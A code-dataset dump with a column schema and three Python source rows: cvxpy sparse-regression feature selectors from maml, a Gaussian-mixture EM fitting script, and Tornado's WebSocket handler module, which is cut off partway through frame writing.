hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2e558a6b97966f8cd0fa07448f3d28add3c6c4ed
| 8,245
|
py
|
Python
|
maml/apps/symbolic/_selectors_cvxpy.py
|
exalearn/maml
|
1cf7a093af69dfde27aaecc17d0b9d34d5c3edff
|
[
"BSD-3-Clause"
] | null | null | null |
maml/apps/symbolic/_selectors_cvxpy.py
|
exalearn/maml
|
1cf7a093af69dfde27aaecc17d0b9d34d5c3edff
|
[
"BSD-3-Clause"
] | null | null | null |
maml/apps/symbolic/_selectors_cvxpy.py
|
exalearn/maml
|
1cf7a093af69dfde27aaecc17d0b9d34d5c3edff
|
[
"BSD-3-Clause"
] | null | null | null |
"""
This module implements more robust optmization
using the cvxpy package
"""
from typing import Optional, List, Dict, Union
import numpy as np
from scipy.linalg import lstsq
from monty.dev import requires
from maml.apps.symbolic._selectors import BaseSelector
try:
import cvxpy as cp
Expression = cp.expressions.expression.Expression
except ImportError:
cp = None
Expression = "Expression"
# pylint: disable=R0201
class BaseSelectorCP(BaseSelector):
"""
Base selector using cvxpy (CP)
"""
@requires(cp is not None, "cvxpy is not present.")
def __init__(self, coef_thres: float = 1e-6, method: str = "ECOS"):
"""
Base selector
Args:
coef_thres (float): threshold to discard certain coefficents
method (str): solver for cvxpy problem. The default is ECOS
"""
super().__init__(coef_thres=coef_thres, method=method)
# pylint: disable=E1128
def select(self, x: np.ndarray, y: np.ndarray, options: Optional[Dict] = None) -> np.ndarray:
"""
Select feature indices from x
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
options (dict): kwargs for cp.Problem.solve
Returns: list of int indices
"""
options = options or {}
n, p = x.shape
beta = cp.Variable(p)
objective = cp.Minimize(self.construct_loss(x, y, beta))
constraints = self.construct_constraints(x, y, beta)
prob = cp.Problem(objective, constraints)
prob.solve(solver=self.method, **options)
self.coef_ = beta.value
self.indices = np.where(np.abs(beta.value) > self.coef_thres)[0]
self.coef_[np.where(np.abs(self.coef_) <= self.coef_thres)[0]] = 0.0
return self.indices
def construct_constraints(
self, x: np.ndarray, y: np.ndarray, beta: Optional[cp.Variable] = None
) -> Optional[List[Expression]]: # type: ignore
"""
Get constraints dictionary from data, e.g.,
{"func": lambda beta: fun(x, y, beta), "type": "ineq"}
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta: (np.ndarray): target variable for optimization
Returns: dict of constraints
"""
return None
def construct_loss(self, x: np.ndarray, y: np.ndarray, beta: cp.Variable) -> Expression: # type: ignore
"""
Get loss function from data and tentative coefficients beta
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (np.ndarray): N coefficients
Returns: loss value
"""
raise NotImplementedError
class DantzigSelectorCP(BaseSelectorCP):
"""
Equation 11 in
https://orfe.princeton.edu/~jqfan/papers/06/SIS.pdf
and reference in https://projecteuclid.org/download/pdfview_1/euclid.aos/1201012958
"""
@requires(cp is not None, "cvxpy is not present.")
def __init__(self, lambd, sigma=1.0, **kwargs):
"""
Dantzig selector
Args:
lamb: tunable parameter
sigma: standard deviation of the error
"""
self.lambd = lambd
self.sigma = sigma
super().__init__(**kwargs)
def construct_loss(self, x: np.ndarray, y: np.ndarray, beta: cp.Variable) -> Expression: # type: ignore
"""
L1 loss
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (cp.Variable): dimension N vector for optimization
Returns: loss expression
"""
return cp.norm1(beta)
def construct_constraints(
self, x: np.ndarray, y: np.ndarray, beta: Optional[cp.Variable] = None
) -> Optional[List[Expression]]: # type: ignore
"""
Dantzig selector constraints
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (cp.Variable): dimension N vector for optimization
Returns: List of constraints
"""
return [cp.norm_inf(x.T @ (y - x @ beta)) <= self.lambd * self.sigma]
class PenalizedLeastSquaresCP(BaseSelectorCP):
"""
Penalized least squares. In addition to minimizing the sum of squares loss,
it adds an additional penalty to the coefficients
"""
def construct_loss(self, x: np.ndarray, y: np.ndarray, beta: cp.Variable) -> Expression: # type: ignore
"""
L1 loss
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (cp.Variable): dimension N vector for optimization
Returns: loss expression
"""
n = x.shape[0]
se = 1.0 / (2 * n) * cp.sum_squares(y - x @ beta) + self.penalty(beta, x=x, y=y)
return se
def penalty(
self, beta: cp.Variable, x: Optional[np.ndarray] = None, y: Optional[np.ndarray] = None
) -> Union[Expression, float]: # type: ignore
"""
Calculate the penalty from input x, output y and coefficient beta
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (np.ndarray): N coefficients
Returns: penalty value
"""
return 0.0
class LassoCP(PenalizedLeastSquaresCP):
"""
Simple Lasso regression
"""
@requires(cp is not None, "cvxpy not installed")
def __init__(self, lambd, **kwargs):
"""
Lasso regression with lambda * norm_1(beta) as penalty
Args:
lambd (float): weights for the penalty
**kwargs:
"""
self.lambd = lambd
super().__init__(**kwargs)
def penalty(
self, beta: cp.Variable, x: Optional[np.ndarray] = None, y: Optional[np.ndarray] = None
) -> Union[Expression, float]: # type: ignore
"""
Calculate the penalty from input x, output y and coefficient beta
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (np.ndarray): N coefficients
Returns: penalty value
"""
beta_abs = cp.norm1(beta)
return self.lambd * beta_abs
class AdaptiveLassoCP(PenalizedLeastSquaresCP):
"""
Adaptive lasso regression using OLS coefficients
as the root-n estimator coefficients
"""
@requires(cp is not None, "cvxpy not installed")
def __init__(self, lambd, gamma, **kwargs):
"""
Adaptive lasso regression
Args:
lambd (float or list of floats):
gamma (float): exponential for hat(beta)
**kwargs:
"""
self.lambd = lambd
self.gamma = gamma
self.w = 1
super().__init__(**kwargs)
def select(self, x: np.ndarray, y: np.ndarray, options: Optional[Dict] = None) -> np.ndarray:
"""
Select feature indices from x
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
options (dict): options in the cp.Problem.solve
Returns: array int indices
"""
self.w = self.get_w(x, y)
return super().select(x, y, options)
def get_w(self, x: np.ndarray, y: np.ndarray) -> np.ndarray:
"""
Get adaptive weights from data
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
Returns: coefficients array
"""
beta_hat = lstsq(x, y)[0]
w = 1.0 / np.abs(beta_hat) ** self.gamma
return w
def penalty(
self, beta: cp.Variable, x: Optional[np.ndarray] = None, y: Optional[np.ndarray] = None
) -> Union[Expression, float]: # type: ignore
"""
Calculate the penalty from input x, output y and coefficient beta
Args:
x (np.ndarray): MxN input data array
y (np.ndarray): M output targets
beta (np.ndarray): N coefficients
Returns: penalty value
"""
return cp.sum(self.lambd * cp.multiply(self.w, cp.abs(beta)))
| 32.848606
| 108
| 0.588235
|
10ec37ccefb9c234b48cf16ca492b47acbc153c6
| 3,588
|
py
|
Python
|
gmm_mle/q3.py
|
nssuperx/PatternRecognition
|
cfb8de6947c2f01cf7825946e1879836167ba849
|
[
"Unlicense"
] | null | null | null |
gmm_mle/q3.py
|
nssuperx/PatternRecognition
|
cfb8de6947c2f01cf7825946e1879836167ba849
|
[
"Unlicense"
] | null | null | null |
gmm_mle/q3.py
|
nssuperx/PatternRecognition
|
cfb8de6947c2f01cf7825946e1879836167ba849
|
[
"Unlicense"
] | null | null | null |
# -*- codeing: utf-8 -*-
import numpy as np
from scipy.stats import norm
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator
# 参考:test_gmm.py
# 混合数5, muとsigmaは関数内で適当に設定
def q3func_gmm(n, fill=0.0):
x = np.zeros(n)
g = np.random.randn(n)
u = np.random.rand(n)
mu = np.array([1.0, 3.0, 5.0, 7.0, 9.0])
sigma = np.array([0.1, 0.3, 0.5, 0.5, 0.5])
flag = (0 <= u) & (u < 1/5)
x = (mu[0] + sigma[0]*g)*flag
flag = (1/5 <= u) & (u < 2/5)
x += (mu[1] + sigma[1]*g)*flag
flag = (2/5 <= u) & (u <= 3/5)
x += (mu[2] + sigma[2]*g)*flag
flag = (3/5 <= u) & (u <= 4/5)
x += (mu[3] + sigma[3]*g)*flag
flag = (4/5 <= u) & (u <= 1)
x += (mu[4] + sigma[4]*g)*flag
return x
# 参考:p118a.py, p118c.py
n = 1000 # 標本数
m = 3 # 混合数
x = q3func_gmm(n)
L = -np.inf
w = np.ones(m)/m
w = w.reshape(m,1) # 縦ベクトルにする
mu = np.linspace( min(x), max(x), m) # 平均値の初期値
mu = mu.reshape(m,1)
sigma2 = np.ones(m)/10 # 分散の初期値
sigma2 = sigma2.reshape(m,1)
Lt = L
wt = w
mut = mu
sigma2t = sigma2
t=0
tt = np.array([0])
while 1:
tmp1 = np.square(np.tile(x, (m,1)) - np.tile(mu, (1,n)))
tmp2 = 2 * np.tile(sigma2, (1,n))
tmp3 = np.tile(w, (1,n)) * np.exp(-tmp1 / tmp2) / np.sqrt(np.pi * tmp2)
eta = tmp3 / np.tile(np.sum(tmp3, axis=0), (m,1))
tmp4 = np.sum(eta, axis=1)
w = tmp4 / n
w = w.reshape(m, 1)
mu = (eta.dot(x)) / tmp4
mu = mu.reshape(m, 1)
sigma2 = np.sum(tmp1*eta, axis=1) / tmp4
sigma2 = sigma2.reshape(m,1)
Lnew = np.sum(np.log(np.sum(tmp3,axis=0)))
wt = np.append(wt,w, axis=1)
mut = np.append(mut,mu, axis=1)
sigma2t = np.append(sigma2t,sigma2, axis=1)
if Lnew - L < 0.0001: # 閾値
break
L = Lnew
Lt = np.append(Lt,L)
t = t+1
tt = np.append(tt,t)
# http://bicycle1885.hatenablog.com/entry/2014/02/14/023734
# https://qiita.com/Tatejimaru137/items/50fb90dd52f194979a13
fig, axs = plt.subplots(2, 2)
xx = np.arange(0,10,0.01)
y0 = norm.pdf(xx, mu[0], np.sqrt(sigma2[0])) # probability density function
y1 = norm.pdf(xx, mu[1], np.sqrt(sigma2[1]))
y2 = norm.pdf(xx, mu[2], np.sqrt(sigma2[2]))
y = w[0] * y0 + w[1] * y1 + w[2] * y2
# axs[0,0].hist(x, bins='auto', normed=True)
axs[0,0].hist(x, bins=100, density=True)
axs[0,0].plot(xx, y, color='r')
# axs[0,0].plot(xx, y0, color='g')
# axs[0,0].plot(xx, y1, color='b')
# axs[0,0].plot(xx, y2, color='y')
axs[0,1].plot(wt[0], label="w0")
axs[0,1].plot(wt[1], label="w1")
axs[0,1].plot(wt[2], label="w2")
axs[0,1].set_xlabel('time')
axs[0,1].set_ylabel('w0, w1, and w2')
axs[0,1].grid(True)
# axs[0,1].xaxis.set_major_locator(MultipleLocator(2)) # 整数で2ずつ
axs[0,1].legend(bbox_to_anchor=(1, 1), loc='upper right')
axs[1,0].plot(mut[0], label="mu0")
axs[1,0].plot(mut[1], label="mu1")
axs[1,0].plot(mut[2], label="mu2")
axs[1,0].set_xlabel('time')
axs[1,0].set_ylabel('mu0, mu1, and mu2')
axs[1,0].grid(True)
# axs[1,0].xaxis.set_major_locator(MultipleLocator(2))
axs[1,0].legend(bbox_to_anchor=(1, 1), loc='upper right')
axs[1,1].plot(np.sqrt(sigma2t[0]), label="sigma0")
axs[1,1].plot(np.sqrt(sigma2t[1]), label="sigma1")
axs[1,1].plot(np.sqrt(sigma2t[2]), label="sigma2")
axs[1,1].set_xlabel('time')
axs[1,1].set_ylabel('sigma0, 1, and 2')
axs[1,1].grid(True)
# axs[1,1].xaxis.set_major_locator(MultipleLocator(2))
axs[1,1].legend(bbox_to_anchor=(1, 1), loc='upper right')
fig.tight_layout() # 余白をそろえる
plt.show()
| 29.652893
| 79
| 0.564103
|
f5e3dbd7f80a6d939c3323396c89afca28ee410f
| 40,773
|
py
|
Python
|
tornado/websocket.py
|
fengsp/tornado
|
43e23f977715396ce243c6cd7e3387abf2a2e4ee
|
[
"Apache-2.0"
] | 1
|
2016-04-08T03:23:58.000Z
|
2016-04-08T03:23:58.000Z
|
tornado/websocket.py
|
fengsp/tornado
|
43e23f977715396ce243c6cd7e3387abf2a2e4ee
|
[
"Apache-2.0"
] | 1
|
2017-09-19T09:52:54.000Z
|
2017-09-19T09:52:54.000Z
|
tornado/websocket.py
|
fengsp/tornado
|
43e23f977715396ce243c6cd7e3387abf2a2e4ee
|
[
"Apache-2.0"
] | 1
|
2016-09-12T09:32:32.000Z
|
2016-09-12T09:32:32.000Z
|
"""Implementation of the WebSocket protocol.
`WebSockets <http://dev.w3.org/html5/websockets/>`_ allow for bidirectional
communication between the browser and server.
WebSockets are supported in the current versions of all major browsers,
although older versions that do not support WebSockets are still in use
(refer to http://caniuse.com/websockets for details).
This module implements the final version of the WebSocket protocol as
defined in `RFC 6455 <http://tools.ietf.org/html/rfc6455>`_. Certain
browser versions (notably Safari 5.x) implemented an earlier draft of
the protocol (known as "draft 76") and are not compatible with this module.
.. versionchanged:: 4.0
Removed support for the draft 76 protocol version.
"""
from __future__ import absolute_import, division, print_function, with_statement
# Author: Jacob Kristhammar, 2010
import base64
import collections
import hashlib
import os
import struct
import tornado.escape
import tornado.web
import zlib
from tornado.concurrent import TracebackFuture
from tornado.escape import utf8, native_str, to_unicode
from tornado import httpclient, httputil
from tornado.ioloop import IOLoop
from tornado.iostream import StreamClosedError
from tornado.log import gen_log, app_log
from tornado import simple_httpclient
from tornado.tcpclient import TCPClient
from tornado.util import _websocket_mask
try:
from urllib.parse import urlparse # py2
except ImportError:
from urlparse import urlparse # py3
try:
xrange # py2
except NameError:
xrange = range # py3
class WebSocketError(Exception):
pass
class WebSocketClosedError(WebSocketError):
"""Raised by operations on a closed connection.
.. versionadded:: 3.2
"""
pass
class WebSocketHandler(tornado.web.RequestHandler):
"""Subclass this class to create a basic WebSocket handler.
Override `on_message` to handle incoming messages, and use
`write_message` to send messages to the client. You can also
override `open` and `on_close` to handle opened and closed
connections.
See http://dev.w3.org/html5/websockets/ for details on the
JavaScript interface. The protocol is specified at
http://tools.ietf.org/html/rfc6455.
Here is an example WebSocket handler that echos back all received messages
back to the client:
.. testcode::
class EchoWebSocket(tornado.websocket.WebSocketHandler):
def open(self):
print("WebSocket opened")
def on_message(self, message):
self.write_message(u"You said: " + message)
def on_close(self):
print("WebSocket closed")
.. testoutput::
:hide:
WebSockets are not standard HTTP connections. The "handshake" is
HTTP, but after the handshake, the protocol is
message-based. Consequently, most of the Tornado HTTP facilities
are not available in handlers of this type. The only communication
methods available to you are `write_message()`, `ping()`, and
`close()`. Likewise, your request handler class should implement
`open()` method rather than ``get()`` or ``post()``.
If you map the handler above to ``/websocket`` in your application, you can
invoke it in JavaScript with::
var ws = new WebSocket("ws://localhost:8888/websocket");
ws.onopen = function() {
ws.send("Hello, world");
};
ws.onmessage = function (evt) {
alert(evt.data);
};
This script pops up an alert box that says "You said: Hello, world".
Web browsers allow any site to open a websocket connection to any other,
instead of using the same-origin policy that governs other network
access from javascript. This can be surprising and is a potential
security hole, so since Tornado 4.0 `WebSocketHandler` requires
applications that wish to receive cross-origin websockets to opt in
by overriding the `~WebSocketHandler.check_origin` method (see that
method's docs for details). Failure to do so is the most likely
cause of 403 errors when making a websocket connection.
When using a secure websocket connection (``wss://``) with a self-signed
certificate, the connection from a browser may fail because it wants
to show the "accept this certificate" dialog but has nowhere to show it.
You must first visit a regular HTML page using the same certificate
to accept it before the websocket connection will succeed.
"""
def __init__(self, application, request, **kwargs):
super(WebSocketHandler, self).__init__(application, request, **kwargs)
self.ws_connection = None
self.close_code = None
self.close_reason = None
self.stream = None
self._on_close_called = False
@tornado.web.asynchronous
def get(self, *args, **kwargs):
self.open_args = args
self.open_kwargs = kwargs
# Upgrade header should be present and should be equal to WebSocket
if self.request.headers.get("Upgrade", "").lower() != 'websocket':
self.set_status(400)
log_msg = "Can \"Upgrade\" only to \"WebSocket\"."
self.finish(log_msg)
gen_log.debug(log_msg)
return
# Connection header should be upgrade.
# Some proxy servers/load balancers
# might mess with it.
headers = self.request.headers
connection = map(lambda s: s.strip().lower(),
headers.get("Connection", "").split(","))
if 'upgrade' not in connection:
self.set_status(400)
log_msg = "\"Connection\" must be \"Upgrade\"."
self.finish(log_msg)
gen_log.debug(log_msg)
return
# Handle WebSocket Origin naming convention differences
# The difference between version 8 and 13 is that in 8 the
# client sends a "Sec-Websocket-Origin" header and in 13 it's
# simply "Origin".
if "Origin" in self.request.headers:
origin = self.request.headers.get("Origin")
else:
origin = self.request.headers.get("Sec-Websocket-Origin", None)
# If there was an origin header, check to make sure it matches
# according to check_origin. When the origin is None, we assume it
# did not come from a browser and that it can be passed on.
if origin is not None and not self.check_origin(origin):
self.set_status(403)
log_msg = "Cross origin websockets not allowed"
self.finish(log_msg)
gen_log.debug(log_msg)
return
self.stream = self.request.connection.detach()
self.stream.set_close_callback(self.on_connection_close)
self.ws_connection = self.get_websocket_protocol()
if self.ws_connection:
self.ws_connection.accept_connection()
else:
if not self.stream.closed():
self.stream.write(tornado.escape.utf8(
"HTTP/1.1 426 Upgrade Required\r\n"
"Sec-WebSocket-Version: 7, 8, 13\r\n\r\n"))
self.stream.close()
def write_message(self, message, binary=False):
"""Sends the given message to the client of this Web Socket.
The message may be either a string or a dict (which will be
encoded as json). If the ``binary`` argument is false, the
message will be sent as utf8; in binary mode any byte string
is allowed.
If the connection is already closed, raises `WebSocketClosedError`.
.. versionchanged:: 3.2
`WebSocketClosedError` was added (previously a closed connection
would raise an `AttributeError`)
.. versionchanged:: 4.3
Returns a `.Future` which can be used for flow control.
"""
if self.ws_connection is None:
raise WebSocketClosedError()
if isinstance(message, dict):
message = tornado.escape.json_encode(message)
return self.ws_connection.write_message(message, binary=binary)
def select_subprotocol(self, subprotocols):
"""Invoked when a new WebSocket requests specific subprotocols.
``subprotocols`` is a list of strings identifying the
subprotocols proposed by the client. This method may be
overridden to return one of those strings to select it, or
``None`` to not select a subprotocol. Failure to select a
subprotocol does not automatically abort the connection,
although clients may close the connection if none of their
proposed subprotocols was selected.
"""
return None
def get_compression_options(self):
"""Override to return compression options for the connection.
If this method returns None (the default), compression will
be disabled. If it returns a dict (even an empty one), it
will be enabled. The contents of the dict may be used to
control the memory and CPU usage of the compression,
but no such options are currently implemented.
.. versionadded:: 4.1
"""
return None
def open(self, *args, **kwargs):
"""Invoked when a new WebSocket is opened.
The arguments to `open` are extracted from the `tornado.web.URLSpec`
regular expression, just like the arguments to
`tornado.web.RequestHandler.get`.
"""
pass
def on_message(self, message):
"""Handle incoming messages on the WebSocket
This method must be overridden.
"""
raise NotImplementedError
def ping(self, data):
"""Send ping frame to the remote end."""
if self.ws_connection is None:
raise WebSocketClosedError()
self.ws_connection.write_ping(data)
def on_pong(self, data):
"""Invoked when the response to a ping frame is received."""
pass
def on_close(self):
"""Invoked when the WebSocket is closed.
If the connection was closed cleanly and a status code or reason
phrase was supplied, these values will be available as the attributes
``self.close_code`` and ``self.close_reason``.
.. versionchanged:: 4.0
Added ``close_code`` and ``close_reason`` attributes.
"""
pass
def close(self, code=None, reason=None):
"""Closes this Web Socket.
Once the close handshake is successful the socket will be closed.
``code`` may be a numeric status code, taken from the values
defined in `RFC 6455 section 7.4.1
<https://tools.ietf.org/html/rfc6455#section-7.4.1>`_.
``reason`` may be a textual message about why the connection is
closing. These values are made available to the client, but are
not otherwise interpreted by the websocket protocol.
.. versionchanged:: 4.0
Added the ``code`` and ``reason`` arguments.
"""
if self.ws_connection:
self.ws_connection.close(code, reason)
self.ws_connection = None
def check_origin(self, origin):
"""Override to enable support for allowing alternate origins.
The ``origin`` argument is the value of the ``Origin`` HTTP
header, the url responsible for initiating this request. This
method is not called for clients that do not send this header;
such requests are always allowed (because all browsers that
implement WebSockets support this header, and non-browser
clients do not have the same cross-site security concerns).
Should return True to accept the request or False to reject it.
By default, rejects all requests with an origin on a host other
than this one.
This is a security protection against cross site scripting attacks on
browsers, since WebSockets are allowed to bypass the usual same-origin
policies and don't use CORS headers.
To accept all cross-origin traffic (which was the default prior to
Tornado 4.0), simply override this method to always return true::
def check_origin(self, origin):
return True
To allow connections from any subdomain of your site, you might
do something like::
def check_origin(self, origin):
parsed_origin = urllib.parse.urlparse(origin)
return parsed_origin.netloc.endswith(".mydomain.com")
.. versionadded:: 4.0
"""
parsed_origin = urlparse(origin)
origin = parsed_origin.netloc
origin = origin.lower()
host = self.request.headers.get("Host")
# Check to see that origin matches host directly, including ports
return origin == host
def set_nodelay(self, value):
"""Set the no-delay flag for this stream.
By default, small messages may be delayed and/or combined to minimize
the number of packets sent. This can sometimes cause 200-500ms delays
due to the interaction between Nagle's algorithm and TCP delayed
ACKs. To reduce this delay (at the expense of possibly increasing
bandwidth usage), call ``self.set_nodelay(True)`` once the websocket
connection is established.
See `.BaseIOStream.set_nodelay` for additional details.
.. versionadded:: 3.1
"""
self.stream.set_nodelay(value)
def on_connection_close(self):
if self.ws_connection:
self.ws_connection.on_connection_close()
self.ws_connection = None
if not self._on_close_called:
self._on_close_called = True
self.on_close()
def send_error(self, *args, **kwargs):
if self.stream is None:
super(WebSocketHandler, self).send_error(*args, **kwargs)
else:
# If we get an uncaught exception during the handshake,
# we have no choice but to abruptly close the connection.
# TODO: for uncaught exceptions after the handshake,
# we can close the connection more gracefully.
self.stream.close()
def get_websocket_protocol(self):
websocket_version = self.request.headers.get("Sec-WebSocket-Version")
if websocket_version in ("7", "8", "13"):
return WebSocketProtocol13(
self, compression_options=self.get_compression_options())
def _wrap_method(method):
def _disallow_for_websocket(self, *args, **kwargs):
if self.stream is None:
method(self, *args, **kwargs)
else:
raise RuntimeError("Method not supported for Web Sockets")
return _disallow_for_websocket
for method in ["write", "redirect", "set_header", "set_cookie",
"set_status", "flush", "finish"]:
setattr(WebSocketHandler, method,
_wrap_method(getattr(WebSocketHandler, method)))
class WebSocketProtocol(object):
"""Base class for WebSocket protocol versions.
"""
def __init__(self, handler):
self.handler = handler
self.request = handler.request
self.stream = handler.stream
self.client_terminated = False
self.server_terminated = False
def _run_callback(self, callback, *args, **kwargs):
"""Runs the given callback with exception handling.
On error, aborts the websocket connection and returns False.
"""
try:
callback(*args, **kwargs)
except Exception:
app_log.error("Uncaught exception in %s",
self.request.path, exc_info=True)
self._abort()
def on_connection_close(self):
self._abort()
def _abort(self):
"""Instantly aborts the WebSocket connection by closing the socket"""
self.client_terminated = True
self.server_terminated = True
self.stream.close() # forcibly tear down the connection
self.close() # let the subclass cleanup
class _PerMessageDeflateCompressor(object):
def __init__(self, persistent, max_wbits):
if max_wbits is None:
max_wbits = zlib.MAX_WBITS
# There is no symbolic constant for the minimum wbits value.
if not (8 <= max_wbits <= zlib.MAX_WBITS):
raise ValueError("Invalid max_wbits value %r; allowed range 8-%d",
max_wbits, zlib.MAX_WBITS)
self._max_wbits = max_wbits
if persistent:
self._compressor = self._create_compressor()
else:
self._compressor = None
def _create_compressor(self):
return zlib.compressobj(tornado.web.GZipContentEncoding.GZIP_LEVEL,
zlib.DEFLATED, -self._max_wbits)
def compress(self, data):
compressor = self._compressor or self._create_compressor()
data = (compressor.compress(data) +
compressor.flush(zlib.Z_SYNC_FLUSH))
assert data.endswith(b'\x00\x00\xff\xff')
return data[:-4]
class _PerMessageDeflateDecompressor(object):
def __init__(self, persistent, max_wbits):
if max_wbits is None:
max_wbits = zlib.MAX_WBITS
if not (8 <= max_wbits <= zlib.MAX_WBITS):
raise ValueError("Invalid max_wbits value %r; allowed range 8-%d",
max_wbits, zlib.MAX_WBITS)
self._max_wbits = max_wbits
if persistent:
self._decompressor = self._create_decompressor()
else:
self._decompressor = None
def _create_decompressor(self):
return zlib.decompressobj(-self._max_wbits)
def decompress(self, data):
decompressor = self._decompressor or self._create_decompressor()
return decompressor.decompress(data + b'\x00\x00\xff\xff')
class WebSocketProtocol13(WebSocketProtocol):
"""Implementation of the WebSocket protocol from RFC 6455.
This class supports versions 7 and 8 of the protocol in addition to the
final version 13.
"""
# Bit masks for the first byte of a frame.
FIN = 0x80
RSV1 = 0x40
RSV2 = 0x20
RSV3 = 0x10
RSV_MASK = RSV1 | RSV2 | RSV3
OPCODE_MASK = 0x0f
def __init__(self, handler, mask_outgoing=False,
compression_options=None):
WebSocketProtocol.__init__(self, handler)
self.mask_outgoing = mask_outgoing
self._final_frame = False
self._frame_opcode = None
self._masked_frame = None
self._frame_mask = None
self._frame_length = None
self._fragmented_message_buffer = None
self._fragmented_message_opcode = None
self._waiting = None
self._compression_options = compression_options
self._decompressor = None
self._compressor = None
self._frame_compressed = None
# The total uncompressed size of all messages received or sent.
# Unicode messages are encoded to utf8.
# Only for testing; subject to change.
self._message_bytes_in = 0
self._message_bytes_out = 0
# The total size of all packets received or sent. Includes
# the effect of compression, frame overhead, and control frames.
self._wire_bytes_in = 0
self._wire_bytes_out = 0
def accept_connection(self):
try:
self._handle_websocket_headers()
self._accept_connection()
except ValueError:
gen_log.debug("Malformed WebSocket request received",
exc_info=True)
self._abort()
return
def _handle_websocket_headers(self):
"""Verifies all invariant- and required headers
If a header is missing or have an incorrect value ValueError will be
raised
"""
fields = ("Host", "Sec-Websocket-Key", "Sec-Websocket-Version")
if not all(map(lambda f: self.request.headers.get(f), fields)):
raise ValueError("Missing/Invalid WebSocket headers")
@staticmethod
def compute_accept_value(key):
"""Computes the value for the Sec-WebSocket-Accept header,
given the value for Sec-WebSocket-Key.
"""
sha1 = hashlib.sha1()
sha1.update(utf8(key))
sha1.update(b"258EAFA5-E914-47DA-95CA-C5AB0DC85B11") # Magic value
return native_str(base64.b64encode(sha1.digest()))
def _challenge_response(self):
return WebSocketProtocol13.compute_accept_value(
self.request.headers.get("Sec-Websocket-Key"))
def _accept_connection(self):
subprotocol_header = ''
subprotocols = self.request.headers.get("Sec-WebSocket-Protocol", '')
subprotocols = [s.strip() for s in subprotocols.split(',')]
if subprotocols:
selected = self.handler.select_subprotocol(subprotocols)
if selected:
assert selected in subprotocols
subprotocol_header = ("Sec-WebSocket-Protocol: %s\r\n"
% selected)
extension_header = ''
extensions = self._parse_extensions_header(self.request.headers)
for ext in extensions:
if (ext[0] == 'permessage-deflate' and
self._compression_options is not None):
# TODO: negotiate parameters if compression_options
# specifies limits.
self._create_compressors('server', ext[1])
if ('client_max_window_bits' in ext[1] and
ext[1]['client_max_window_bits'] is None):
# Don't echo an offered client_max_window_bits
# parameter with no value.
del ext[1]['client_max_window_bits']
extension_header = ('Sec-WebSocket-Extensions: %s\r\n' %
httputil._encode_header(
'permessage-deflate', ext[1]))
break
if self.stream.closed():
self._abort()
return
self.stream.write(tornado.escape.utf8(
"HTTP/1.1 101 Switching Protocols\r\n"
"Upgrade: websocket\r\n"
"Connection: Upgrade\r\n"
"Sec-WebSocket-Accept: %s\r\n"
"%s%s"
"\r\n" % (self._challenge_response(),
subprotocol_header, extension_header)))
self._run_callback(self.handler.open, *self.handler.open_args,
**self.handler.open_kwargs)
self._receive_frame()
def _parse_extensions_header(self, headers):
extensions = headers.get("Sec-WebSocket-Extensions", '')
if extensions:
return [httputil._parse_header(e.strip())
for e in extensions.split(',')]
return []
def _process_server_headers(self, key, headers):
"""Process the headers sent by the server to this client connection.
'key' is the websocket handshake challenge/response key.
"""
assert headers['Upgrade'].lower() == 'websocket'
assert headers['Connection'].lower() == 'upgrade'
accept = self.compute_accept_value(key)
assert headers['Sec-Websocket-Accept'] == accept
extensions = self._parse_extensions_header(headers)
for ext in extensions:
if (ext[0] == 'permessage-deflate' and
self._compression_options is not None):
self._create_compressors('client', ext[1])
else:
raise ValueError("unsupported extension %r", ext)
def _get_compressor_options(self, side, agreed_parameters):
"""Converts a websocket agreed_parameters set to keyword arguments
for our compressor objects.
"""
options = dict(
persistent=(side + '_no_context_takeover') not in agreed_parameters)
wbits_header = agreed_parameters.get(side + '_max_window_bits', None)
if wbits_header is None:
options['max_wbits'] = zlib.MAX_WBITS
else:
options['max_wbits'] = int(wbits_header)
return options
def _create_compressors(self, side, agreed_parameters):
# TODO: handle invalid parameters gracefully
allowed_keys = set(['server_no_context_takeover',
'client_no_context_takeover',
'server_max_window_bits',
'client_max_window_bits'])
for key in agreed_parameters:
if key not in allowed_keys:
raise ValueError("unsupported compression parameter %r" % key)
other_side = 'client' if (side == 'server') else 'server'
self._compressor = _PerMessageDeflateCompressor(
**self._get_compressor_options(side, agreed_parameters))
self._decompressor = _PerMessageDeflateDecompressor(
**self._get_compressor_options(other_side, agreed_parameters))
def _write_frame(self, fin, opcode, data, flags=0):
if fin:
finbit = self.FIN
else:
finbit = 0
frame = struct.pack("B", finbit | opcode | flags)
